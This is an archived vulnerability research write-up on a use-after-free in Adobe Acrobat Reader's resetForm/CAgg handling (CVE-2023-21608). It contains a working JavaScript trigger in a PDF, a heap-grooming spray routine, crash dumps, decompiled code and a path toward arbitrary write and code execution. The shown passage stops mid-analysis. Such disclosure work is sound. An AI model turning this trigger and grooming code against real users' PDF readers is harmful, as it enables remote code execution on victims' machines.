CVE-2023-21608: Adobe Acrobat Reader resetForm RCE

⚠️ [ ORIGIN SOURCE ]

https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608

📅 [ Archival Date ]

Feb 7, 2023 8:24 PM

🏷️ [ Tags ]

AdobeAcrobatRCE

✍️ [ Author ]

Ashfaq Ansari, Krishnakant Patil

💣 [ PoC / Exploit ]

https://crash.software/STRLCPY/CVE-2023-21608

Overview

In the third part of the PDF Reader series, we are going to see how we exploited a use-after-free vulnerability in Adobe Acrobat Reader DC. The bug was found during our fuzzing campaign targeting popular PDF readers. We were able to successfully exploit this vulnerability to gain Remote Code Execution in the context of Adobe Acrobat Reader.

We have already shared two parts of the series, in which we exploited Adobe Reader for Information Leaks and Foxit PDF Reader for Remote Code Execution (RCE). Both parts are linked below so that you can read more about them.

Zero Day Initiative (ZDI) acquired both the vulnerability and the exploit.

Advisory

CVE-2023-21608

Testbed

OS edition: Windows 10 Pro 20H2 19042.804
Product: Adobe Acrobat Reader DC 2022.003.20258
Product URL: https://get.adobe.com/reader/otherversions/

Proof of Concept

The test case contains a static text field named testField embedded inside a PDF document.

5 0 obj
<<
/Type /Annot
/Subtype /Widget
/T (testField)
/FT /Tx
/Rect [0 0 0 0]
>>

The relevant JavaScript that triggers the bug is given below.

var testField = this.getField("testField");

testField.richText = true;
testField.setAction("Calculate", "calculateCallback()");

try { this.resetForm(); } catch (e) {}
try { this.resetForm(); } catch (e) {}  // bug is triggered during this resetForm call

function calculateCallback()
{
  event.__defineGetter__("target", getterFunc);
  event.richValue = this;
}

function getterFunc()
{
  try { Object.defineProperty(testField, "textFont", { value: this }); } catch(e) { }
}

Crash State

Enable page-heap for AcroRd32.exe and open the crash.pdf file with Adobe Acrobat Reader DC.

eax=04f6a0f0 ebx=00000000 ecx=420fefd0 edx=44e1cff8 esi=6921ef50 edi=420fefd0
eip=6c556b99 esp=04f6a0d0 ebp=04f6a0fc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
AcroForm!CAgg::operator[](unsigned short)+0xe:
6c556b99 8b07            mov     eax,dword ptr [edi]  ds:002b:420fefd0=????????

Note: All analysis and exploitation outlined in this post is done on Adobe Acrobat Reader DC version 2022.001.20085 x86.

Stack Trace

0:000> kb
 # ChildEBP RetAddr      Args to Child              
00 04f6a0fc 6c552a50     00001742 408bcff0 00000000 AcroForm!CAgg::operator[](unsigned short)+0xe
01 04f6a118 6bdfd922     43a38fb8 527e4ff0 408bcff0 AcroForm!EScript_ESObjectEnum_CallbackProc+0x30
02 04f6a16c 6bdfd803     43a38fb8 6c552a20 04f6a1c8 EScript!ESObjectEnum+0xc3
03 04f6a184 692fe993     43a38fb8 6c552a20 04f6a1c8 EScript!ESObjectEnumWrapper+0x13
WARNING: Stack unwind information not available. Following frames may be wrong.
04 04f6a19c 6c55298c     43a38fb8 6c552a20 04f6a1c8 AcroRd32!DllCanUnloadNow+0xa6553
05 04f6a1e4 6c552c3f     420fefd0 43a38fb8 00000000 AcroForm!ESValToCAgg_internal+0x447
06 04f6a20c 6c552a56     420fefd0 46ed4ff0 00000000 AcroForm!ESValToCAgg(CAgg &, _s_ESValRec *, unsigned short)+0xd6
07 04f6a228 6bdfd922     503d4fb8 45970ff0 46ed4ff0 AcroForm!EScript_ESObjectEnum_CallbackProc+0x36
08 04f6a27c 6bdfd803     503d4fb8 6c552a20 04f6a2d8 EScript!ESObjectEnum+0xc3
09 04f6a294 692fe993     503d4fb8 6c552a20 04f6a2d8 EScript!ESObjectEnumWrapper+0x13
0a 04f6a2ac 6c55298c     503d4fb8 6c552a20 04f6a2d8 AcroRd32!DllCanUnloadNow+0xa6553
0b 04f6a2f4 6c552c3f     505fafd0 503d4fb8 00000000 AcroForm!ESValToCAgg_internal+0x447
0c 04f6a31c 6c552a56     505fafd0 3d259ff0 00000000 AcroForm!ESValToCAgg(CAgg &, _s_ESValRec *, unsigned short)+0xd6
0d 04f6a338 6bdfd922     4e5dcfb8 4948eff0 3d259ff0 AcroForm!EScript_ESObjectEnum_CallbackProc+0x36
0e 04f6a38c 6bdfd803     4e5dcfb8 6c552a20 04f6a3e8 EScript!ESObjectEnum+0xc3
0f 04f6a3a4 692fe993     4e5dcfb8 6c552a20 04f6a3e8 EScript!ESObjectEnumWrapper+0x13
10 04f6a3bc 6c55298c     4e5dcfb8 6c552a20 04f6a3e8 AcroRd32!DllCanUnloadNow+0xa6553
11 04f6a404 6c552c3f     04f6afa8 4e5dcfb8 00000000 AcroForm!ESValToCAgg_internal+0x447
12 04f6a42c 6c552aea     04f6afa8 47cf6ff0 00000000 AcroForm!ESValToCAgg(CAgg &, _s_ESValRec *, unsigned short)+0xd6
13 04f6a46c 6c513b35     04f6afa8 47cf6ff0 00000000 AcroForm!ESValToCAggWrapper+0x1e
14 04f6a4c8 6bddf79b     48cf2fb8 45230ff0 47cf6ff0 AcroForm!SetRichValueEventProp+0x1f5
15 04f6a534 6bddf5bc     3cdaef58 04f6a68c 04f6a568 EScript!sub_1003F620+0x17b
16 04f6a56c 6bdba592     3cdaef58 04f6a68c 04f6a68c EScript!sub_1003F4E7+0xd5
17 04f6a5a4 6bdba2fe     3cdaef58 04f6a68c 04f6a68c EScript!sub_1001A4D2+0xc0
18 04f6a64c 6bdd8a6b     3cdaef58 04f6a68c 04f6a68c EScript!sub_10019E93+0x46b
19 04f6a690 6bdd4cd7     3cdaef58 04f6aac0 4fdc2fcf EScript!sub_100389D2+0x99
1a 04f6ab00 6bdd246b     3cd5da60 6bdd24c0 00000438 EScript!js_Interpret+0x2828
1b 04f6ab4c 6bdd237b     3cdaef58 04f6ab60 3cdaef58 EScript!sub_10032412+0x59
1c 04f6ab88 6bdd22b0     3cdaef58 04f6abfc 3d1a4100 EScript!sub_10032315+0x66
1d 04f6abbc 6bdbb6b0     3cdaef58 04f6abfc 3d1a4100 EScript!js_Execute+0x7d
1e 04f6ac0c 6bdfa9c6     3cdaef58 04f6ac8c 00000000 EScript!JS_EvaluateUCScriptForPrincipals+0x8b
1f 04f6ac90 6bdfa6cb     3cdaef58 3d1a4100 4c93efd8 EScript!JS_EvaluateUCScript+0x4d
20 04f6ae44 6bdfa046     3d4f9ff0 49488fe0 49f3cff0 EScript!ESExecScript+0x10b
21 04f6ae90 6bdf8e23     3cdacfc0 390b4fb8 49d20fc0 EScript!AESEvaluateScript+0x3d
22 04f6af30 692fcbdf     1f2c0bd0 390b4fb8 49cf4fc0 EScript!ESExecuteScriptWithEvent+0x4a3
23 04f6af58 6c543fd4     1f2c0bd0 00000000 49cf4fc0 AcroRd32!DllCanUnloadNow+0xa479f
24 04f6b03c 6c543270     1f2c0bd0 5135cfa0 00000000 AcroForm!AFCalculateNthFieldEntry_x+0x4b8
25 04f6b074 6c545f65     1f2c0bd0 00000000 00001467 AcroForm!AFPDCalculateFields__internal+0xfd
26 04f6b0b0 6c5c4c37     1f2c0bd0 00000000 1f2c0bd0 AcroForm!AFPDCalculateFields+0x9f
27 04f6b1b0 6c50fa1c     1f2c0bd0 00000000 00000000 AcroForm!ResetForm(_t_PDDoc *, OPAQUE_64_BITS, unsigned short)+0x477
28 04f6b65c 6bdf3fb7     390b4fb8 45fe4ff0 5225afb8 AcroForm!resetFormHandler+0x5fc

A quick verification using the !heap command reveals that this is a use-after-free vulnerability.

0:000> !ext.heap -p -a @edi
    address 420fefd0 found in
    _DPH_HEAP_ROOT @ 7831000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                   372134ac:         420fe000             2000
    6e44ab02 verifier!AVrfDebugPageHeapFree+0x000000c2
    770af766 ntdll!RtlDebugFreeHeap+0x0000003e
    770668ae ntdll!RtlpFreeHeap+0x0004e0ce
    770562ed ntdll!RtlpFreeHeapInternal+0x00000783
    77018786 ntdll!RtlFreeHeap+0x00000046
    755d3c9b ucrtbase!_free_base+0x0000001b
    755d3c68 ucrtbase!free+0x00000018
    6c2e7a56 AcroForm!operator delete(void *)+0x0000000b
    6c555f05 AcroForm!sub_20AD5ECD+0x00000038
    6c555e5f AcroForm!sub_20AD5E3B+0x00000024
    6c555e54 AcroForm!sub_20AD5E3B+0x00000019
    6c555e1b AcroForm!sub_20AD5DE9+0x00000032
    6c557abf AcroForm!CAgg::convertASAtommap(bool (&)[27])+0x000002e0
    6c557559 AcroForm!CAgg::convert(bool (&)[27])+0x000000e7
    6c5576c0 AcroForm!CAgg::convert(CAgg::CAggType)+0x00000045
    6c556d10 AcroForm!sub_20AD6CDD+0x00000033
    6c555efd AcroForm!sub_20AD5ECD+0x00000030
    6c555e5f AcroForm!sub_20AD5E3B+0x00000024
    6c555e54 AcroForm!sub_20AD5E3B+0x00000019
    6c555e54 AcroForm!sub_20AD5E3B+0x00000019
    6c555e1b AcroForm!sub_20AD5DE9+0x00000032
    6c557abf AcroForm!CAgg::convertASAtommap(bool (&)[27])+0x000002e0
    6c557559 AcroForm!CAgg::convert(bool (&)[27])+0x000000e7
    6c55766d AcroForm!sub_20AD75F2+0x0000007b
    6c551b9e AcroForm!CAggConvertToESValType(CAgg &)+0x0000001f
    6c551be0 AcroForm!CAggToESVal(_s_ESValRec *, CAgg &)+0x0000003d
    6c5131ce AcroForm!GetRichValueEventProp+0x0000011e
    6bdde176 EScript!sub_1003DF10+0x00000266
    6bde306d EScript!sub_10042FE8+0x00000085
    6bdb50fd EScript!sub_10014B57+0x000005a6
    6bdb4b4a EScript!sub_10014B17+0x00000033
    6bdddcd2 EScript!sub_1003DC6A+0x00000068

At this stage, with the above initial analysis in hand, we decided to dig into the root cause of this bug and see whether we could exploit it to achieve RCE in Adobe Reader's sandbox process.

Root Cause Analysis

A couple of things to note in this PoC:

The bug occurs during the second call to resetForm
resetForm invokes calculate events on all fields if a Calculate handler is defined
In the Calculate handler, the event object's target property is overridden with a user-defined function getterFunc
Inside this getterFunc function, the textFont property of the field is redefined with the value of the doc object
This causes a crash when the event.richValue = this assignment is executed in the Calculate handler

The crash can be traced back through the call stack to the responsible call hierarchy.

AcroForm!ResetForm                             | this.resetForm()
  AcroForm!AFPDCalculateFields
    AcroForm!AFCalculateNthFieldEntry
      |- user defined callback is triggered.   | field Calculate handler invoked
        AcroForm!SetRichValueEventProp         | event.richValue = this

        .. some form of aggregation starts on richValue ..

          AcroForm!EScript_ESObjectEnum_CallbackProc
            AcroForm!CAgg::operator[](unsigned short)

The bug occurs when value aggregation starts inside SetRichValueEventProp. The aggregation enumerates the assigned object this, which is an instance of the current doc object.

The properties and methods of doc are enumerated recursively using EScript!ESObjectEnum, which accepts a callback where enumerated property details are passed from EScript to AcroForm. The AcroForm!EScript_ESObjectEnum_CallbackProc callback is triggered for every property being enumerated.

When page-heap is enabled, the crash occurs in _DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3) when dereferencing the this pointer, which is a std::map object in the current context.

_DWORD *__thiscall std::map<unsigned short,CAgg>::lower_bound(TREE_VAL *this, _DWORD *a2, unsigned __int16 *a3)
{
  TREE_NODE *Myhead; // eax
  TREE_NODE *Parent; // ecx
  unsigned __int16 v5; // si
  int v6; // eax

  Myhead = this->_Myhead;  // crash location - page-heaps enabled
  Parent = this->_Myhead->_Parent;
  ...
}

After checking for the caller of this function, it appears that the int __thiscall std::map<unsigned short,CAgg>::operator[](TREE_VAL *this, int a2, unsigned __int16 *pSomeID) function is responsible for inserting a value into the corresponding std::map.

int __thiscall std::map<unsigned short,CAgg>::operator[](TREE_VAL *this, int a2, unsigned __int16 *pSomeID)
{
  ...
  std::map<unsigned short,CAgg>::lower_bound(this, v8, pSomeID);  // Crashing path when page-heap is enabled
  v4 = v9;
  if ( sub_208E95F2(v9, pSomeID) )
  {
    ...
  }
  else
  {
    if ( this->_Mysize == 0x38E38E3 )
      Throw_tree_length_error();
    ...
    *(_DWORD *)a2 = std::map<unsigned short,CAgg>::insert(this, v8[0], (int)v8[1], Parent);
    ...
  }
  return result;
}

The code above shows that a new CAgg allocation is created while inserting a value into the std::map. Testing with heap grooming and the .dvalloc trick revealed that the std::map<unsigned short,CAgg>::insert function also allows for arbitrary writes on the chosen address. By using heap grooming, it is possible to gain control of the corrupted std::map pointer used in this context, allowing for further exploitation.

TREE_NODE *__thiscall std::map<unsigned short,CAgg>::insert(TREE_VAL *this, TREE_NODE *a2, int a3, TREE_NODE *a4)
{
  
  ++this->_Mysize;  // write possible here (single increment though)
                    // map length increase
  Myhead = this->_Myhead;
  v5 = a4;
  a4->_Parent = a2;
  if ( a2 != Myhead )
  {
    if ( a3 )
    {
      a2->_Left = a4;  // write is possible here and we can use this to corrupt the length property of an ArrayBuffer
                       // mov dword ptr [eax], esi  ds:002b:13fa0000=45454545
      if ( a2 == Myhead->_Left )
        Myhead->_Left = a4;
    }
  }
   ...
}
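
To make the two writes easier to follow, here is a minimal sketch that replays only the statements shown above on a simulated 32-bit memory. It is a model, not the real routine. The field offsets (_Myhead at +0x0, _Mysize at +0x4, _Left at +0x0, _Parent at +0x4), the helper names, and the addresses are assumptions chosen for illustration, and the elided parts of the function are not modelled.

```javascript
// Simulated 32-bit little-endian memory; all addresses are offsets into this buffer.
const mem = new DataView(new ArrayBuffer(0x100));
const read32 = (addr) => mem.getUint32(addr, true);
const write32 = (addr, value) => mem.setUint32(addr, value >>> 0, true);

// Assumed layout: TREE_VAL  { +0x0 _Myhead, +0x4 _Mysize },
//                 TREE_NODE { +0x0 _Left,   +0x4 _Parent }.
function insertModel(thisPtr, a2, addLeft, a4) {
  write32(thisPtr + 4, read32(thisPtr + 4) + 1);      // ++this->_Mysize
  const myhead = read32(thisPtr);                     // Myhead = this->_Myhead
  write32(a4 + 4, a2);                                // a4->_Parent = a2
  if (a2 !== myhead && addLeft) {
    write32(a2, a4);                                  // a2->_Left = a4
    if (a2 === read32(myhead)) write32(myhead, a4);   // Myhead->_Left = a4
  }
}

// Hypothetical addresses for the map, its head node, the insert position and the new node.
const MAP = 0x10, HEAD = 0x20, WHERE = 0x40, NEW_NODE = 0x60;
write32(MAP, HEAD);    // this->_Myhead
write32(MAP + 4, 5);   // this->_Mysize

insertModel(MAP, WHERE, true, NEW_NODE);

// The size field was incremented, and the dword at WHERE now holds the new node pointer.
console.log(read32(MAP + 4).toString(16), read32(WHERE).toString(16));
```

In this model, whoever controls the memory behind this and a2 decides where the increment and the pointer store land, which is the behaviour the comments in the decompiled code describe.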

By exploiting the arbitrary write, it is possible to corrupt the length of an ArrayBuffer and gain a relative out-of-bounds read-write primitive, that is, the ability to read from and write to memory outside the bounds of the ArrayBuffer, addressed relative to its start.

Further investigation into how the map was corrupted revealed that the AcroForm!CAgg::operator[](unsigned short) function was calling std::map<unsigned short,CAgg>::operator[] with this->map. When examining the CAgg object in the debugger, it was discovered that it had been freed and was now user-controlled. This opened up the possibility for further exploitation of the vulnerability.

// Crash function 2
int __userpurge CAgg::operator[]@<eax>(CAgg *this@<ecx>, bool (*a2)[27]@<ebx>, wchar_t *someID)
{
  ...

  if ( this->type == 0x13 )  // *this == (CAgg::getType) | crashes here with page-heaps
                             // this is the freed pointer
  {
    ...
  }
  else
  {
    ...
    else
    {
      // this path is taken when page-heap is disabled and heap grooming is performed prior to bug trigger
      CAgg::convert(this, a2, 0x14);
      v4 = (_DWORD *)std::map<unsigned short,CAgg>::operator[](this->map, (int)v9, (unsigned __int16 *)&someID);
    }
    return *v4 + 24;
  }
}

While there were no obvious primitives available on the corrupted CAgg object, it was possible to read its type with this->type. The CAgg::operator[] function was called from EScript_ESObjectEnum_CallbackProc, which is triggered for each property being enumerated by EScript!ESObjectEnum. This provided some insight into how the object was corrupted and could potentially be exploited.

int __usercall EScript_ESObjectEnum_CallbackProc@<eax>(
        bool (*ebx0)[27]@<ebx>,
        int a2,
        wchar_t *key_str,
        wchar_t *a4,
        int ***pCAggData)
{
  CAgg **pCagg; // edi
  unsigned __int16 someID; // ax
  CAgg *v7; // eax

  pCagg = (CAgg **)*pCAggData;  // AtomFromString retrieves some integer id from string
                                //
                                // bp AcroForm!sub_20AD2A20+0x22 "da poi(esp); gc"
                                //
  someID = (*(int (__cdecl **)(wchar_t *))(gCoreHFT + 20))(key_str);  // gCoreHFT->ASAtomFromString(key_str);
  v7 = (CAgg *)CAgg::operator[]((CAgg *)pCagg, ebx0, (wchar_t *)someID);
  ESValToCAgg(v7, a4, 0);
  return 1;
}

In this scenario, the problem lies with the pCagg object. It has already been freed, but it is still used in the callback function EScript_ESObjectEnum_CallbackProc, where it is passed on to the ESValToCAgg function.

Note: This function is recursive, so the problem repeats over and over.

Our analysis shows that the CAgg objects are allocated inside the std::map<unsigned short,CAgg>::operator[] function during each property enumeration when setting the richValue property. However, during the resetForm process, the event.target property is trapped using __defineGetter__. This function is called during the recursive properties enumeration of the doc object. When the target property is accessed, the getterFunc function is called, which redefines the field's textFont property as the doc object. This also sets it to be non-configurable and non-enumerable.
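
The property descriptor behaviour that the PoC relies on can be reproduced outside Acrobat. The sketch below is a minimal illustration in plain JavaScript. It assumes an ordinary object as a stand-in for the Field (the real testField is a host object), and the names field and redefine are ours, not part of the PoC. Defining a property with only a value leaves it non-configurable, non-enumerable and non-writable, so a later redefinition with a different value throws.

```javascript
// Hypothetical stand-in for the Acrobat Field object (a plain object here).
const field = {};

// Mirrors the try/catch in getterFunc, but reports what happened.
function redefine(target, value) {
  try {
    Object.defineProperty(target, "textFont", { value: value });
    return "ok";
  } catch (e) {
    return e.constructor.name;
  }
}

const firstCall = redefine(field, { call: 1 });    // models the first resetForm
const desc = Object.getOwnPropertyDescriptor(field, "textFont");
const secondCall = redefine(field, { call: 2 });   // models the second resetForm, with a different value

console.log(firstCall, desc.configurable, desc.enumerable, desc.writable, secondCall);
// prints: ok false false false TypeError
```

In the PoC the exception is swallowed by the try/catch inside getterFunc, so the only visible effect of the second call is the different code path taken afterwards.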

During the second resetForm, the same process is repeated, but when getterFunc is called again, it raises an exception because the field.textFont property is now non-configurable. This causes a different path to be taken when accessing the event.richValue property, which frees all of the CAgg objects that have been constructed so far. The free code path is called while the object enumeration is still in progress, and when it finishes, it triggers the use of the freed CAgg object.

{
  ...
  v7 = 0;
  v8 = 15;
  LOBYTE(v6[0]) = 0;
  sub_2085ECA0(v6, "EventRichValueInProgress");
  sub_20AAE7D6(v15, a1, (int)v6[0], (int)v6[1], (int)v6[2], (int)v6[3], v7, v8);
  LOBYTE(v16) = 3;
  if ( v13
    && (*(unsigned __int16 (__thiscall **)(_DWORD, wchar_t *, const wchar_t *))(dword_21473CB8 + 180))(
          *(_DWORD *)(dword_21473CB8 + 180),
          v13,
          "richValue") )
  {
    PointerType = (CAgg *)ASCabGetPointerTypeSafe<CAgg *>(v13, (wchar_t *)"richValue", (wchar_t *)"CAgg_P");
    if ( PointerType )
      CAggToESVal(0, v11, PointerType);  // frees all CAggs and maps
  }
  ...
}

The above hypothesis can be verified using a debugger by setting up the following breakpoints in WinDbg.

bp AcroForm!resetFormHandler
bp AcroForm!EScript_ESObjectEnum_CallbackProc ".printf \"-- [^] property: %ma - \\n \", poi(esp+8); gc;"
bp AcroForm!uninit_sub_20AA701F+0x25 ".printf \"    - alloc: %p \\n \", @eax; .echo; gc"
bp AcroForm!GetRichValueEventProp+0x119 ".printf \" ------------free code path \\n \"; gc"
bp AcroForm!sub_20AD5DE9 ".printf \"[map] root: %p size %p \\n \", poi(@ecx), poi(@ecx+4); gc;"
bp AcroForm!sub_20AD5DE9+0x36 ".printf \"   [+] PTR_1 freed: %p \\n \", poi(@esi); gc"
bp AcroForm!sub_20AD6CDD+0x3c ".printf \"   [+] PTR_2 freed: %p \\n \", @esi; gc"
bp AcroForm!sub_20AD5ECD+0x33 ".printf \"   [+] block freed: %p \\n \", @esi; gc"
bp AcroForm!ESValToCAgg_internal+0x403 ".printf \"   [+] pData: %p \\n \", @ecx; gc"

The trace output result from the above breakpoints is provided below.

[+] pData: 00afb1e8
 -- [^] property: ADBCAnnotEnumerator -
     - alloc: 64b3cfb8

     ... all other properties ....

-- [^] property: textFont -
     - alloc: d41d0fb8                       <- CAgg* allocated here

   [+] pData: d41d0fd0                       <- std::map inside CAgg
 -- [^] property: change -
     - alloc: 6951bfb8

     ... all other properties ....
 
-- [^] property: rc -
     - alloc: c7b8efb8

 ------------free code path
 ...

[map] root: d2d14fb8 size 0000018f
 [map] root: ee802fb8 size 00000041
    [+] block freed: ce58efb8
    [+] block freed: e0dd6fb8
    ...
 [map] root: e4826fb8 size 00000008
    ...
    [+] PTR_1 freed: e4826fb8
    [+] block freed: d41d0fb8                <-  CAgg* freed here
    [+] block freed: c211afb8
    ...
 [map] root: d2bdcfb8 size 00000000
    [+] PTR_1 freed: d2bdcfb8
    [+] block freed: 6c43efb8
    [+] block freed: d3612fb8
    ...

 -- [^] property: richValue -

(1ba0.f80): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: 382C19E:0

eax=00afa330 ebx=00000000 ecx=d41d0fd0 edx=7af18ff8 esi=6fa3ef50 edi=d41d0fd0
eip=6e6b6b99 esp=00afa310 ebp=00afa33c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
AcroForm!CAgg::operator[](unsigned short)+0xe:
6e6b6b99 8b07            mov     eax,dword ptr [edi]  ds:002b:d41d0fd0=abcdbbba

0:000> dc d41d0fb8
d41d0fb8  00000000 00000000 00000000 00000000  ................
d41d0fc8  00000000 00000000 abcdbbba 07971000  ................
d41d0fd8  00000010 00001000 00000000 00000000  ................
d41d0fe8  09009a6c dcbabbba 00000000 ffffff82  l...............
d41d0ff8  3b5fafc0 c0c0c001 c0c0c0c0 c0c0c0c0  .._;............
d41d1008  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0  ................
d41d1018  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0  ................
d41d1028  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0  ................

Inside the debugger, we can see the corrupted std::map object pData: d41d0fd0, which is part of the freed CAgg object that was allocated during the enumeration of the textFont property alloc: d41d0fb8.

When the free code path is taken, all objects and map objects are freed. The same pointer is later accessed when processing the richValue property enumeration, leading to a use-after-free condition.
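
The sequence in the trace can be modelled in a few lines of plain JavaScript. This is a toy simulation under stated assumptions, not Adobe's code. The Agg class, toAgg and runModel are hypothetical names, a freed flag stands in for real memory being released, and a getter stands in for the code path that frees the aggregates while enumeration is still running.

```javascript
// Toy stand-in for CAgg: a node that owns a map of child nodes.
class Agg {
  constructor(name) {
    this.name = name;
    this.children = new Map();
    this.freed = false;
  }
  // Analogous to CAgg::operator[]: look up or create the child for a key.
  child(key) {
    if (this.freed) {
      throw new Error("use-after-free: " + this.name + " used for key " + key);
    }
    if (!this.children.has(key)) {
      this.children.set(key, new Agg(this.name + "." + key));
    }
    return this.children.get(key);
  }
  // Analogous to the free code path: releases this node and everything below it.
  freeAll() {
    this.freed = true;
    for (const c of this.children.values()) c.freeAll();
    this.children.clear();
  }
}

// Recursive enumeration: `agg` stays referenced while property reads may run user code.
function toAgg(agg, value) {
  if (value === null || typeof value !== "object") return;
  for (const key of Object.keys(value)) {
    const slot = agg.child(key);
    toAgg(slot, value[key]); // reading value[key] may invoke a getter
  }
}

function runModel() {
  const root = new Agg("root");
  const doc = {
    textFont: {
      change: 1,
      get rc() { root.freeAll(); return 0; }, // frees every node mid-enumeration
      richValue: 1,
    },
  };
  try {
    toAgg(root, doc);
    return null;
  } catch (e) {
    return e.message;
  }
}

console.log(runModel());
// prints: use-after-free: root.textFont used for key richValue
```

As in the trace, the node created for textFont is released while its properties are still being enumerated, and the stale reference is used again when the richValue property is processed.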

Note: During the testing to control the use-after-free condition, we did not find any code paths that would allow us to reallocate the freed memory in a way that could be exploited.

However, we discovered that certain object sizes can cause Adobe Acrobat Reader to crash while dereferencing the sprayed pattern, giving us the possibility to exploit the bug for Remote Code Execution (RCE).

Heap Grooming

var blockRefs = [];

function groomLFH(size, count) {
  log("[+] Grooming LFH blocks of size: " + size + " count: " + count);

  const code =
      "%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848%u4949%u4a4a%u4b4b%u4c4c%u4d4d%u4e4e%u4f4f%u5050%u4141%u4242%u5353%u5454%u5555%u5656%u5757%u5858%u5959%u5a5a%u5b5b%u5c5c%u5d5d%u5e5e%u5f5f%u6060%u6161%u6262%u6363%u6464%u6565%u6666%u6767%u6868%u6969%u6a6a%u6b6b%u6c6c%u6d6d%u6e6e%u6f6f%u7070%u7171%u7272%u7373%u7474%u7575%u7676%u7777%u7878%u7979%u7a7a%u7b7b%u7c7c%u7d7d%u7e7e%u7f7f%u8080%u8181%u8282%u8383%u8484";
  const string = unescape(code);

  for (var i = 0; i < count; i++) {
      blockRefs.push(string.substr(0, (size - 2) / 2).toUpperCase());
  }

  for (var i = 0; i < blockRefs.length; i += 2) {
      blockRefs[i] = null;
      delete blockRefs[i];
  }
}

groomLFH(68, 4000);

By grooming heap allocations with an object of size 68, we were able to control the crash. The crashing object size was initially found by brute forcing.

Note: The grooming was done before the UaF was triggered. We will come back to this later.

eax=04b7a854 ebx=04b7a8b4 ecx=42424141 edx=4e4e4d4d esi=6921ef50 edi=42424141
eip=6c3695af esp=04b7a838 ebp=04b7a838 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
AcroForm!CAgg::operator[](unsigned short)+0x3:
6c3695af 8b01            mov     eax,dword ptr [ecx]  ds:002b:42424141=????????

In the crashing function, we can see that the user-controlled value is being dereferenced.
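
The link between the sprayed pattern and the register values can be checked with a short sketch. It assumes the string's 16-bit code units are stored little-endian, as the string dump later in this post suggests. The helper toUtf16le is our own name, and only the first 16 code units of the pattern are used.

```javascript
// First 16 code units of the groomLFH pattern.
const pattern = unescape(
  "%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848" +
  "%u4949%u4a4a%u4b4b%u4c4c%u4d4d%u4e4e%u4f4f%u5050"
);

// Lay the string out as UTF-16LE bytes, the way 16-bit code units sit in x86 memory.
function toUtf16le(str) {
  const view = new DataView(new ArrayBuffer(str.length * 2));
  for (let i = 0; i < str.length; i++) {
    view.setUint16(i * 2, str.charCodeAt(i), true);
  }
  return view;
}

const patternBytes = toUtf16le(pattern);
const dwordAt0 = patternBytes.getUint32(0, true);
const dwordAt24 = patternBytes.getUint32(24, true);

// groomLFH(68, ...) keeps (68 - 2) / 2 code units per string.
const unitsPerString = (68 - 2) / 2;

console.log(dwordAt0.toString(16), dwordAt24.toString(16), unitsPerString);
// prints: 42424141 4e4e4d4d 33
```

The first dword of the pattern is 0x42424141, the value seen in ecx and edi, and 0x4e4e4d4d, the value seen in edx, is the pattern's dword at byte offset 24. That edx was loaded from that offset is an inference from the pattern, not something the crash dump states.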

The allocation source can be verified in WinDbg as shown below.

0:015> !ext.heap -p -a 36f76fb8
    address 36f76fb8 found in
    _DPH_HEAP_ROOT @ 9801000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                36f51924:         36f76fb8               48 -         36f76000             2000
    6fb1a8b0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    76fbef0e ntdll!RtlDebugAllocateHeap+0x00000039
    76f26150 ntdll!RtlpAllocateHeap+0x000000f0
    76f257fe ntdll!RtlpAllocateHeapInternal+0x000003ee
    76f253fe ntdll!RtlAllocateHeap+0x0000003e
    75d00166 ucrtbase!_malloc_base+0x00000026
    6aaaee40 AcroForm!operator new(unsigned int)+0x0000001a
    6acf7044 AcroForm!sub_20AA701F+0x00000025
    6ad25a56 AcroForm!sub_20AD5A43+0x00000013
    6ad25fba AcroForm!std::map<unsigned short,CAgg>::operator[](unsigned short const&)+0x00000057
    6ad26bc5 AcroForm!CAgg::operator[](unsigned short)+0x0000003a
    6ad22a50 AcroForm!EScript_ESObjectEnum_CallbackProc+0x00000030
    ...
    6ace3b35 AcroForm!SetRichValueEventProp+0x000001f5
    ...

Looking further into why heap grooming before the bug trigger leads to a controlled crash, we observed that the array of sprayed string objects is also used during aggregation while resetForm is in progress.

Inside CAggToESVal, when the object type is a string, the code below is executed, which creates a new string from the CAgg.

int __usercall CAggToESVal@<eax>(bool (*a1)[27]@<ebx>, wchar_t *a2, CAgg *a3)
{
  ...
  else
    {
      m_str = (_EStrRec **)CAgg::toEStr(a3, a1);
      if ( *m_str )
        v14 = EStrCopyImpl(*m_str);
      else
        v14 = 0;
      if ( EStrGetEncoding((MayBeString *)v14) )
        EStrSetEncoding(v14, 2);
      v15 = dword_21472158;
      Bytes = EStrGetBytes((MayBeString *)v14);
      result = (*((int (__cdecl **)(wchar_t *, int))v15 + 31))(a2, Bytes);  // ESValSetString
      if ( v14 )
        return EStrDelete(v14);
    }
}

One important detail to note here is the call to EScript!ESValSetString, which creates new string content from the CAgg string objects (these are our sprayed string objects). ESValSetString calls sub_1003EBD2 to create a string with the given content; that function in turn allocates a heap buffer of the string's length and copies the source string content into it.

char **__usercall sub_1003EBD2@<eax>(__int128 a1@<xmm0>, int a2, wchar_t *a3)
{
  ...
  sub_1003E853((int *)a2);
  if ( a3
    && strlen_0(a3, 0x7FFFFFFFu, 0) > 1
    && (*(_BYTE *)a3 == 0xFE && *((_BYTE *)a3 + 1) == 0xFF || *(_BYTE *)a3 == 0xFF && *((_BYTE *)a3 + 1) == 0xFE) )
  {
    v24 = 0;
    v22 = 0x7FFFFFFF;
    _mm_lfence();
    v3 = miStrlen(a3, v22, v24);
